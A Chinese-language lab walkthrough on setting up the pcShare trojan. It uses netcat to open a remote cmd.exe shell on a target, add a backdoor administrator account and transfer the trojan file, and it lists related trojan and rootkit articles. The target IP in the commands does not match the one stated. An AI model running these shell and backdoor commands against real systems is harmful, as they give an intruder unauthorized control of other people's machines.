木马程序的配置和使用实验
木马程序的配置和使用实验
- 实验准备
- 实验环境
- 实验过程
- 生成木马控制文件
- 通过nc.exe 开启远程shell
- 通过远程shell传输木马文件
- 实验问题
- 发生系统错误 5。 拒绝访问
实验准备
控制机A和被控制机都需要安装两个软件
实验环境
- 控制机A
- 目标主机B
IP:192.168.6.128
实验过程
生成木马控制文件
- 打开pcShare生成控制文件
不建议使用80端口,80端口一般被web占用,或者被保护
ip地址要控制在自己列表范围内(随意)
点击生成,建议放在控制机A nc程序的同级目录下
通过nc.exe 开启远程shell
- 在目标主机(B)开启端口监听
切换到nc.exe软件所在的目录
开启端口监听
nc -L -d -e cmd.exe -p 8888
2. 控制机A连接目标主机并开启远程命令行shell
这个过程中目标主机B的提示符窗口不能关闭,保持时刻监听
切换到nc程序所在的目录,输入命令
nc 192.168.6.120 8888
在目标主机创建新用户
net user admin_test "pasword" /add
net localgroup administrators admin_test /add
net user
通过远程shell传输木马文件
参考linux nc 传输文件
端口号随意
nc -v -l -p 7777 >test.exe
新开一个命令提示符传输文件
传输成功
实验问题
发生系统错误 5。 拒绝访问
错误
发生系统错误 5。 拒绝访问
原因
权限不足,导致创建失败
解决方案之一
打开任务管理器
右键任务栏 选择任务管理器
详细信息 > 菜单栏 > 文件 > 运行新任务
勾选以管理员身份运行并确认
打开命令提示符后继续 执行命令
木马程序的配置和使用实验相关推荐
- 实验一木马分析(隐藏分析)实验
实验一木马分析(隐藏分析)实验 1.木马隐藏技术 1)程序隐藏 木马程序可以利用程序捆绑的方式,将自己和正常的exe 文件进行捆绑.当双击运行捆绑后的程序时,正常的exe 文件运行了.程序隐藏只能达到 ...
- 解决“由于应用程序的配置不正确,应用程序未能启动,重新安装应用程序可能会纠正这个问题”...
[VS2005]解决"由于应用程序的配置不正确,应用程序未能启动,重新安装应用程序可能会纠正这个问题" 今天在准备发布用VS2005写的那个程序时,拷贝到我同事机器上,双击突然出现 ...
- 解决“由于应用程序的配置不正确,应用程序未能启动,重新安装应用程序可能会纠正这个问题”(转贴)...
[VS2005]解决"由于应用程序的配置不正确,应用程序未能启动,重新安装应用程序可能会纠正这个问题" 今天在准备发布用VS2005写的那个程序时,拷贝到我同事机器上,双击突然出现 ...
- nc扫描端口-curl-手动查杀木马过程之生成木马程序病原体并自动运行
实验环境 RHEL6 本节所讲内容: 22.1 使用nc扫描端口 22.2 curl 查看web服务器类型 22.3 手动查杀木马过程之生成木马程序病原体 22.4 手动查杀木马过程之让木马程序自动运 ...
- python编写木马攻击_Python编写简易木马程序
Python编写简易木马程序 0x00 准备 文章内容仅供学习研究.切勿用于非法用途! 这次我们使用Python编写一个具有键盘记录.截屏以及通信功能的简易木马.依然选用Sublime text2 + ...
- 用python做一个木马_Python编程简单的木马程序(转载于乌云中)
Python编程简单的木马程序 light·2015/01/26 10:07 0x00准备好了 本文的内容仅用于研究和研究,不得用于非法目的! 这一次,我们使用Python编写了一个简单的木马,它具有 ...
- Linux下木马程序隐藏进程实战
实验环境 本实验在6.x的操作系统上完成: [root@gaosh-1 ~]# cat /etc/redhat-release CentOS release 6.9 (Final) Rootkit概述 ...
- 通过木马程序rootkit隐蔽行踪-创建root用户都删除不了的木马文件
1-1-1-通过木马程序rootkit隐蔽行踪 1-1-2-创建一个让root用户都删除不了的木马文件 实战1 :内容 : 1.通过rootkit提权 2.通过rootkit隐藏木马进程号 3.通过r ...
- 无节制流氓推广 2345旗下下载站正在传播木马程序
近日,火绒工程师发现2345旗下"多特下载站"的下载器(高速下载)正在实施传播木马程序的恶意行为.用户下载运行该下载器后,会立即被静默植入一款名为"commander&q ...
最新文章
- Asp.net无刷新调用后台实体类数据并以Json格式返回
- C++ 接口(抽象类)
- GitHub被中国人霸榜!国外开发者不开心了
- centos mysql 启动_MYSQL在centos上首次启动
- hive 常用UDF
- 开源 TiDB Operator 让 TiDB 成为真正的 Cloud-Native 数据库
- 富勒wms系统里的定时器id_「案例」全面升级的康缘药业物流系统
- 深入浅出SCSI子系统(六)SCSI 磁盘驱动
- 中兴盒子B860A-免拆机-线刷-第三方刷机固件及教程
- Vue.2Vue.3项目引入Element-UI教程踩坑
- uniapp调用芯烨xprinter打印机安卓sdk
- Java中Scanner的进阶---求和与求平均数
- Unity3D学习日记2
- 基于EEG信号与面部表情的连续情绪识别
- 解决RuntimeError: cuDNN error: CUDNN_STATUS_EXECUTION_FAILED 踩过的坑(配置环境:linux+anaconda3+pytorch ...)
- 史上最简单的 MySQL 教程(十四)「列属性 之 主键」
- 【NOI OJ】18 Tomorrow never knows?(未知的明天)
- 2020-11-23 PTA算法_贪心算法部分习题及代码
- 黑客攻防从入门到精通(一)
- windows远程连接redis